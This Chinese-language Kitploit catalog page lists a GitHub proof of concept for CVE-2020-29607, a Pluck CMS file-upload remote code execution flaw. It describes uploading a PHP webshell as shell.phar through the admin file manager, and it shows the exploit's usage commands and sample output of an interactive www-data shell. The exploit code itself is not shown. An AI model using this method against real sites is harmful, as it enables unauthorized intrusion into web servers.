Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC — Pluck CMS <= 4.7.13 经过身份验证的RCE漏洞利用,通过未验证的文件上传。上传PHP webshell并提供交互式命令shell。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubestebanzarate/cve-2020-29607-pluck-cms-4.7.13-authenticated-file-upload-rce-poc

CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

Pluck CMS <= 4.7.13 经过身份验证的RCE漏洞利用,通过未验证的文件上传。上传PHP webshell并提供交互式命令shell。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
17个月前尚未审核
分享

CVE-2020-29607 — Pluck CMS <= 4.7.13 认证文件上传远程代码执行 (PoC)

Pluck CMS 4.7.13 之前的版本存在认证远程代码执行漏洞。管理员文件管理器(admin.php?action=files)未验证文件扩展名,允许上传 .phar 文件,Apache 会将其作为 PHP 执行。通过此端点上传 webshell 会导致以 Web 服务器用户身份执行远程代码。


工作原理

  1. 使用提供的管理员密码进行身份验证。
  2. 通过管理员文件管理器上传 PHP webshell 为 shell.phar。
  3. 通过请求 shell 并运行 id 验证执行。
  4. 针对上传的 webshell 打开交互式命令循环。

依赖要求

  • Python 3
  • 安装依赖:
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

使用方法

# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck

示例:

$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

参考

  • CVE-2020-29607
  • EDB-49909
  • 原始 PoC 由 Ron Jost (Hacker5preme) 提供

致谢

  • 发现与原始漏洞利用: Ron Jost (Hacker5preme)
  • Python 3 移植与交互式 shell: Esteban Zárate
下载工具